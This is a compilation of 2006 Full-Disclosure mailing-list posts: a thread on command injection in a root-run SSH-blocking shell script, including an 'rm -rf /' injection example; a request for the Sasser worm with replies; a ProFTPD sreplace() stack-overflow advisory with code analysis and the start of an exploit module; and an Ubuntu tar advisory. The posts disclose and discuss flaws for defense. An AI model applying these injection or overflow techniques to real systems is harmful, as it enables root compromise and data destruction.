Tavis Ormandy wrote: On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote: Mea culpa. Tavis's exploit doesn't so scary things, although he's right you should really be doing a bit more sanitization of (evil) user-supplied input, given that you're (insisting that you) run as root. Gabriel, I was referring to this line: awk '!/#/ /\./ !a[$0]++ {print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT}' /etc/hosts.deny |\ awk '/iptables/ !/#/ !/-s -i/'|sh (note the |sh), $1 can be controlled by specially crafted attempted logins. Thanks, Tavis. That specially crafted attempt would be a HUGE raping of TCP/IP. How do you supposed it would be possible for someone to insert 0wn3ed or any other variable outside of an IP address? -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
That specially crafted attempt would be a HUGE raping of TCP/IP. How do you supposed it would be possible for someone to insert 0wn3ed or any other variable outside of an IP address? Remember the (in)famous quote ...that vulnerability is purely theoretical...? I think the point is you don't use $language to split a bunch of fields, and then pipe them back through /bin/sh without making sure they're not malicious. Doesn't matter that you can't think of a way to make them malicious .. somebody else will find one. It's safer to just assume it'll happen and always sanitize variables before you {do_stuff;} with them. (my $0.02) ~Mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote: You are dealing with output you can't trust there. $13 could be anything, including \n`rm -rf /`. Later on, you pass $13, unstripped of newlines, backticks, or any number of other special character to a shell running as uid 0. That shell will proceed to execute whatever we would like it to, where we are the remote attacker who doesn't even have an account. No it can't. Even if it was rm -rf someone placed in, did you not notice my grep statement? Only print items with a decimal. At no given point anywhere on the 13th column whether its Solaris, NetBSD, FreeBSD, would there be an option for someone to craft anything... FreeBSD -bash2-2.05b$ uname -a FreeBSD ethos.disgraced.org 5.4-RELEASE-p14 FreeBSD 5.4-RELEASE-p14 #1: Thu May 11 01:34:54 CDT 2006 [EMAIL PROTECTED]:/usr/obj/usr/src/sys/ETHOS i386 -bash2-2.05b$ sudo awk '{print $13}' /var/log/auth.log|sort -ru 57354 57340 57335 56253 55125 49211 40334 37188 3508 33875 33635 33454 32798 3137 2895 2638 2408 2301 2114 - OpenBSD # uname -a OpenBSD hades.disgraced.org 4.0 GENERIC#1 i386 # awk '{print $13}' /var/log/authlog|grep \.|sort -ru 63.243.158.221 61.129.85.230 220.132.113.163 219.149.211.49 213.195.75.41 206.210.96.56 I don't believe the suggestion was ever that you had malicious intent, but rather that you have very horrible coding security habits. This should have been stated to the list as opposed to You're backdooring people I'm disinclined to sort out which of your machines I can get root on right now because you are running this script, but I would expect that someone reading this mailing list is already on the way and would strongly advise that you disable those cron jobs. I'll give you addresses if you'd like to take a shot at it. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote: On Mon, Nov 27, 2006 at 04:41:43PM -0500, J. Oquendo wrote: That specially crafted attempt would be a HUGE raping of TCP/IP. How do you supposed it would be possible for someone to insert 0wn3ed or any other variable outside of an IP address? That's impossible. Putting extra spaces in the log entry is easy. And extra spaces would do what... If the point is to insert a name someone in order to send out information from the 13th column in authlog, then I'll tell you what, you name the system it can happen on and I will personally apologize publicly. It is not doable. I'd have a better chance of hanging with Santa while I bang Angelina Jolie while Denise Richards watches me. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Michael Holstein wrote: That specially crafted attempt would be a HUGE raping of TCP/IP. How do you supposed it would be possible for someone to insert 0wn3ed or any other variable outside of an IP address? Remember the (in)famous quote ...that vulnerability is purely theoretical...? I think the point is you don't use $language to split a bunch of fields, and then pipe them back through /bin/sh without making sure they're not malicious. Doesn't matter that you can't think of a way to make them malicious .. somebody else will find one. It's safer to just assume it'll happen and always sanitize variables before you {do_stuff;} with them. (my $0.02) ~Mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ So I ask you too... Find me any Unix derivative that will allow someone to pass a name, word, place, etc into the 13th column of authlog, then bypass grep which is grep'ing out for decimals. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On 27.Nov.2006 04:39PM -0500, Michael Holstein wrote: why not save all that trouble and just use the --limit directive in iptables? (examples on the netfilter mailing-list). or use denyhosts (denyhosts.sf.net) --josh Joshua D. Abraham Northeastern University College of Computer and Information Science www.ccs.neu.edu/home/jabra ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:55:46PM -0500, J. Oquendo wrote: No it can't. Even if it was rm -rf someone placed in, did you not notice my grep statement? Only print items with a decimal. At no given point anywhere on the 13th column whether its Solaris, NetBSD, FreeBSD, would there be an option for someone to craft anything... J, I realise this is a difficult issue to grasp, but stick with it. Let's say that a ficticious log entry looks like this: DATE ERROR USERNAME ADDRESS PORT And let's say you're trying to print column 4 to get the address. Here's an example: Monday INVALID foobar 123.123.123.123 1024 You print $4 and get 123.123.123.123, excellent. Now lets try logging in as foo bar. Monday INVALID foo bar 123.123.123.123 1024 Whats in $4 now? That's right, attacker controlled data. I'll give you addresses if you'd like to take a shot at it. Sure, send them to the list, there are bound to be some takers. Thanks, Tavis. -- - [EMAIL PROTECTED] | finger me for my pgp key. --- pgpONwcIhJ92Q.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Potentially OT: AJAX article
Dear all, Please forgive the potentially off topic post, but please find below a link to a recent article concerning AJAX security I composed for Heise UK / c't, in the sincere hopes that it proves useful to anyone still even remotely interested in much hyped Web 2.0 technologies (or DHTML...) Many thanks. Michael Kemp (clappymonkey) Ajax Security: Stronger than Dirt? A look at the security implications of Ajax Ajax allows the development of more feature rich, asynchronous applications, but in doing so opens up new possibilities for attackers. We look at the relevant security issues and their possible solutions. http://www.heise-security.co.uk/articles/81264 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
Well if it's an air gapped network then there's no way to get patches unless you carry them over on a disk. When I taught a class at a local university we did a similar experiment on an unpatched air gapped network. On 11/27/06, K F (lists) [EMAIL PROTECTED] wrote: a douchebag? I dunno but why the hell aren't your boxes patched to Sasser yet? -KF deep fried wrote: What am I Consultant? School Teacher? Terrorist? On 11/27/06, *K F (lists)* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? Its not like he is intentionally letting it loose on the entire school LAN. -KF [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Chris - I don't know what to make of your please reply off-list; I'm not a member comment. It's almost as ridiculous as what you are requesting. If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district. Speak as a network engineer for a large midwestern schooldistrict, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out; that I'll be making a point of asking who the computer teachers are in that building. You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network. = I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006 13:31:04 CST, Octal said: Well if it's an air gapped network then there's no way to get patches unless you carry them over on a disk. When I taught a class at a local university we did a similar experiment on an unpatched air gapped network. I've seen this done lots of times. Amazing how often people forget to wipe the disks after delivering the patches... ;) pgpAOxm0JTNZc.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ProFTPD 1.3.0 remote stack overflow
Hi all, Our ProFTPD advisory is below. Name: ProFTPD remote buffer overflow vulnerability Vendor: http://www.proftpd.org Release date: 27 Nov, 2006 URL: http://www.gleg.net/proftpd.txt CVE: CVE-2006-5815 Author: Evgeny Legerov [EMAIL PROTECTED] I. DESCRIPTION A remotely exploitable stack overflow vulnerability has been found in ProFTPD server. The vulnerability allows a remote authenticated attacker to gain root privileges. II. DETAILS The vulnerability exists in sreplace() function from src/support.c Oversimplified analysis of the vulnerability is below: char *sreplace(pool *p, char *s, ...) { va_list args; char *m,*r,*src = s,*cp; char **mptr,**rptr; char *marr[33],*rarr[33]; char buf[PR_TUNABLE_PATH_MAX] = {'\0'}, *pbuf = NULL; size_t mlen = 0, rlen = 0, blen; int dyn = TRUE; cp = buf; *cp = '\0'; memset(marr, '\0', sizeof(marr)); memset(rarr, '\0', sizeof(rarr)); blen = strlen(src) + 1; va_start(args, s); while ((m = va_arg(args, char *)) != NULL mlen sizeof(marr)-1) { char *tmp = NULL; size_t count = 0; if ((r = va_arg(args, char *)) == NULL) break; /* Increase the length of the needed buffer by the difference between * the given match and replacement strings, multiplied by the number * of times the match string occurs in the source string. */ tmp = strstr(s, m); while (tmp) { pr_signals_handle(); count++; /* Be sure to increment the pointer returned by strstr(3), to * advance past the beginning of the substring for which we are * looking. Otherwise, we just loop endlessly, seeing the same * value for tmp over and over. */ tmp += strlen(m); tmp = strstr(tmp, m); } /* We are only concerned about match/replacement strings that actually * occur in the given string. */ if (count) { blen += count * (strlen(r) - strlen(m)); marr[mlen] = m; rarr[mlen++] = r; } } va_end(args); /* Try to handle large buffer situations (i.e. escaping of * PR_TUNABLE_PATH_MAX * (2048) correctly, but do not allow very big buffer sizes, that may * be dangerous (BUFSIZ may be defined in stdio.h) in some library * functions. */ #ifndef BUFSIZ # define BUFSIZ 8192 #endif if (blen BUFSIZ) [1] cp = pbuf = (char *) pcalloc(p, ++blen); if (!pbuf) { [2] cp = pbuf = buf; dyn = FALSE; blen = sizeof(buf); } while (*src) { for (mptr = marr, rptr = rarr; *mptr; mptr++, rptr++) { mlen = strlen(*mptr); rlen = strlen(*rptr); if (strncmp(src, *mptr, mlen) == 0) { [3] sstrncpy(cp, *rptr, blen - strlen(pbuf)); if (((cp + rlen) - pbuf + 1) blen) { pr_log_pri(PR_LOG_ERR, WARNING: attempt to overflow internal ProFTPD buffers); cp = pbuf + blen - 1; goto done; } else { cp += rlen; } src += mlen; break; } } if (!*mptr) { [4]if ((cp - pbuf + 1) blen) { pr_log_pri(PR_LOG_ERR, WARNING: attempt to overflow internal ProFTPD buffers); cp = pbuf + blen - 1; } *cp++ = *src++; } } done: *cp = '\0'; if (dyn) return pbuf; return pstrdup(p, buf); } First of all, the value of 'blen' is controlled by us, if we set it to a value which less than BUFSIZ (see [1]) - we can trigger heap overflow, otherwise we will be able to trigger stack overflow (see [2]). Because of miscalculation on line [4], we can overwrite last (NULL) byte of 'pbuf' - so that 'strlen(pbuf)' will be greater than 'blen'. The code on line [3] will overwrite the 'pbuf' buffer with our data because the 'sstrncpy' function works just nice when the third argument is negative. At least two vectors are exist for this vulnerability: 1. MKD command 2. pr_display_file The included trivial proof of concept exploit code uses the second attack vector. Write access is necessary for this exploit to work. III. VENDOR RESPONSE The vendor has released 1.3.0a version which addresses this issue. For more info about the newest version of ProFTPD and possible workarounds please visit: http://www.proftpd.org http://bugs.proftpd.org/show_bug.cgi?id=2858 IV. CREDIT The vulnerability has been discovered by Evgeny Legerov. V. EXPLOIT # vd_proftpd.pm - Metasploit module for ProFTPD stack overflow # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED AS IS AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES #
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006 17:16:31 EST, Rick said: On Mon, 27 Nov 2006, [EMAIL PROTECTED] wrote: You would have us believe that the guy is clued enough to run a closed lab without screwing up (and there's *lots* of ways to screw up, starting with forgetting to wipe the drives afterwards, forgetting to disable a wireless card, forgetting to not plug any of the boxes into the normal net, forgetting to...). so when you go to mcdonalds and hand over your $5 for your MCbig meal, do you consider the repercussions of supporting an industry which pays low wages, is under-staffed, and promotes world-hunger by using enough grain to feed a continent, etc...? WTF does that have to do with the topic? Unless you want to make the point that often, the McDonald's staff fails to use a level of food-preparation hygiene that matches the computer-security hygiene requirements to work with known malware? The average McDonald's doesn't have biohazard signs (whether they should is a different rant) - and even the average doctor's office that *does* have biohazard signs for used hypodermic needles and the like usually has special training/procedures for dealing with the stuff. And labs that do active research on biohazards have even stricter protocols. (Make note, there *have* been screw-ups in the protocols at places that handle stuff like Ebola and smallpox - Preston's The Hot Zone has a nice story of a dead monkey with nothing but a plastic garbage bag keeping the nasties in, and a few years ago, there was a small to-do in one of the labs in England that had some smallpox...) And yet he's not clued enough to know how to find a copy of Sasser by himself. so what? do *you* know where to find a copy? Yes. did you always? Yes. have you always been able to configure a network to talk via EIGRP? No, because when I first got on the net, RFC1058 was still 4 years in the future. So it wasn't always possible, because the option didn't always exist. There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy. perhaps the next time you need a doctor, the one you find will laugh at you with the same sense of elitism you demonstrate. Did I say I was one of the lot of people? Did you notice that I was replying *in the context of KF's comments* saying It's cool because it's in a closed lab? pgpcvyXkmDcml.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006, [EMAIL PROTECTED] wrote: You would have us believe that the guy is clued enough to run a closed lab without screwing up (and there's *lots* of ways to screw up, starting with forgetting to wipe the drives afterwards, forgetting to disable a wireless card, forgetting to not plug any of the boxes into the normal net, forgetting to...). so when you go to mcdonalds and hand over your $5 for your MCbig meal, do you consider the repercussions of supporting an industry which pays low wages, is under-staffed, and promotes world-hunger by using enough grain to feed a continent, etc...? And yet he's not clued enough to know how to find a copy of Sasser by himself. so what? do *you* know where to find a copy? did you always? have you always been able to configure a network to talk via EIGRP? There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy. perhaps the next time you need a doctor, the one you find will laugh at you with the same sense of elitism you demonstrate. Rick ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ProFTPD remote buffer overflow vulnerability
Hi all, Name: ProFTPD remote buffer overflow vulnerability Vendor: http://www.proftpd.org Release date: 27 Nov, 2006 URL: http://www.gleg.net/proftpd.txt CVE: CVE-2006-5815 Author: Evgeny Legerov [EMAIL PROTECTED] I. DESCRIPTION A remotely exploitable stack overflow vulnerability has been found in ProFTPD server. The vulnerability allows a remote authenticated attacker to gain root privileges. II. DETAILS The vulnerability exists in sreplace() function from src/support.c Oversimplified analysis of the vulnerability is below: char *sreplace(pool *p, char *s, ...) { va_list args; char *m,*r,*src = s,*cp; char **mptr,**rptr; char *marr[33],*rarr[33]; char buf[PR_TUNABLE_PATH_MAX] = {'\0'}, *pbuf = NULL; size_t mlen = 0, rlen = 0, blen; int dyn = TRUE; cp = buf; *cp = '\0'; memset(marr, '\0', sizeof(marr)); memset(rarr, '\0', sizeof(rarr)); blen = strlen(src) + 1; va_start(args, s); while ((m = va_arg(args, char *)) != NULL mlen sizeof(marr)-1) { char *tmp = NULL; size_t count = 0; if ((r = va_arg(args, char *)) == NULL) break; /* Increase the length of the needed buffer by the difference between * the given match and replacement strings, multiplied by the number * of times the match string occurs in the source string. */ tmp = strstr(s, m); while (tmp) { pr_signals_handle(); count++; /* Be sure to increment the pointer returned by strstr(3), to * advance past the beginning of the substring for which we are * looking. Otherwise, we just loop endlessly, seeing the same * value for tmp over and over. */ tmp += strlen(m); tmp = strstr(tmp, m); } /* We are only concerned about match/replacement strings that actually * occur in the given string. */ if (count) { blen += count * (strlen(r) - strlen(m)); marr[mlen] = m; rarr[mlen++] = r; } } va_end(args); /* Try to handle large buffer situations (i.e. escaping of * PR_TUNABLE_PATH_MAX * (2048) correctly, but do not allow very big buffer sizes, that may * be dangerous (BUFSIZ may be defined in stdio.h) in some library * functions. */ #ifndef BUFSIZ # define BUFSIZ 8192 #endif if (blen BUFSIZ) [1] cp = pbuf = (char *) pcalloc(p, ++blen); if (!pbuf) { [2] cp = pbuf = buf; dyn = FALSE; blen = sizeof(buf); } while (*src) { for (mptr = marr, rptr = rarr; *mptr; mptr++, rptr++) { mlen = strlen(*mptr); rlen = strlen(*rptr); if (strncmp(src, *mptr, mlen) == 0) { [3] sstrncpy(cp, *rptr, blen - strlen(pbuf)); if (((cp + rlen) - pbuf + 1) blen) { pr_log_pri(PR_LOG_ERR, WARNING: attempt to overflow internal ProFTPD buffers); cp = pbuf + blen - 1; goto done; } else { cp += rlen; } src += mlen; break; } } if (!*mptr) { [4]if ((cp - pbuf + 1) blen) { pr_log_pri(PR_LOG_ERR, WARNING: attempt to overflow internal ProFTPD buffers); cp = pbuf + blen - 1; } *cp++ = *src++; } } done: *cp = '\0'; if (dyn) return pbuf; return pstrdup(p, buf); } First of all, the value of 'blen' is controlled by us, if we set it to a value which less than BUFSIZ (see [1]) - we can trigger heap overflow, otherwise we will be able to trigger stack overflow (see [2]). Because of miscalculation on line [4], we can overwrite last (NULL) byte of 'pbuf' - so that 'strlen(pbuf)' will be greater than 'blen'. The code on line [3] will overwrite the 'pbuf' buffer with our data because the 'sstrncpy' function works just nice when the third argument is negative. At least two vectors are exist for this vulnerability: 1. MKD command 2. pr_display_file The included proof of concept exploit code uses the second attack vector. Write access is necessary for this exploit to work. III. VENDOR RESPONSE The vendor has released 1.3.0a version which addresses this issue. For more info about the newest version of ProFTPD and possible workarounds please visit: http://www.proftpd.org http://bugs.proftpd.org/show_bug.cgi?id=2858 IV. CREDIT The vulnerability has been discovered by Evgeny Legerov. V. EXPLOIT # vd_proftpd.pm - Metasploit module for ProFTPD stack overflow # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED AS IS AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
[Full-disclosure] [USN-385-1] tar vulnerability
=== Ubuntu Security Notice USN-385-1 November 27, 2006 tar vulnerability CVE-2006-6097 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: tar 1.15.1-2ubuntu0.2 Ubuntu 6.06 LTS: tar 1.15.1-2ubuntu2.1 Ubuntu 6.10: tar 1.15.91-2ubuntu0.3 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Teemu Salmela discovered that tar still handled the deprecated GNUTYPE_NAMES record type. This record type could be used to create symlinks that would be followed while unpacking a tar archive. If a user or an automated system were tricked into unpacking a specially crafted tar file, arbitrary files could be overwritten with user privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu0.2.diff.gz Size/MD5:29654 155f4628f9fef19aa20e3927a857fd0d http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu0.2.dsc Size/MD5: 574 22006def60be25510613a955ca7e90d2 http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1.orig.tar.gz Size/MD5: 2204322 d87021366fe6488e9dc398fcdcb6ed7d amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu0.2_amd64.deb Size/MD5: 531932 d507bfc76276c9cc43ebf56f9d69038a i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu0.2_i386.deb Size/MD5: 519858 ed19ee38f074d841366737e880a5c626 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu0.2_powerpc.deb Size/MD5: 533886 5d0d477d0bbe5589f5a3181144099c92 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu0.2_sparc.deb Size/MD5: 525056 1fa9aa25fbbc81c4fcf767c28b4eb991 Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.1.diff.gz Size/MD5:30078 32b5ca833a90aa5bcbc3941a07dbf81a http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.1.dsc Size/MD5: 574 c68c40e5d79b9afd13626694b0bcb2d4 http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1.orig.tar.gz Size/MD5: 2204322 d87021366fe6488e9dc398fcdcb6ed7d amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.1_amd64.deb Size/MD5: 532022 ddcb1e2e8770645f683b462b095ff851 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.1_i386.deb Size/MD5: 519384 be7fa1ac67587e1ef574ed457e967454 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.1_powerpc.deb Size/MD5: 533876 4b9404feef3aaaf23cf28abd1432517b sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.1_sparc.deb Size/MD5: 523654 1164fe3b20e4f530df21258907f3cd9d Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91-2ubuntu0.3.diff.gz Size/MD5:16849 1776a8a649f3fec68c6990accd5f47c8 http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91-2ubuntu0.3.dsc Size/MD5: 596 58f9bea1622976afa48a7eb61e8945e8 http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91.orig.tar.gz Size/MD5: 2016367 e2338a16b0464ec03826e000dae990a0 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91-2ubuntu0.3_amd64.deb Size/MD5: 361636 9580b1e23dc58caf6af9543dbe045dca i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91-2ubuntu0.3_i386.deb Size/MD5: 346396 4bb2868d5fc2855a8242c6c89c7afb12 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91-2ubuntu0.3_powerpc.deb Size/MD5: 365486 79ddf1293d8e759fd96fee0c612d6000 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91-2ubuntu0.3_sparc.deb Size/MD5: 348136 ffdb48742e8bc415682f18d6c74f70c2 signature.asc Description: Digital
Re: [Full-disclosure] Sasser or other nasty worm needed
I doubt schools have CLOSED LAB. I would like to know where the budget comes from, for this type of network. If so , then every school district board needs one.. :)- On 11/27/06, K F (lists) [EMAIL PROTECTED] wrote: Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? Its not like he is intentionally letting it loose on the entire school LAN. -KF [EMAIL PROTECTED] wrote: Chris - I don't know what to make of your please reply off-list; I'm not a member comment. It's almost as ridiculous as what you are requesting. If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district. Speak as a network engineer for a large midwestern schooldistrict, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out; that I'll be making a point of asking who the computer teachers are in that building. You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network. = I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards andPhishing Banks (fwd)
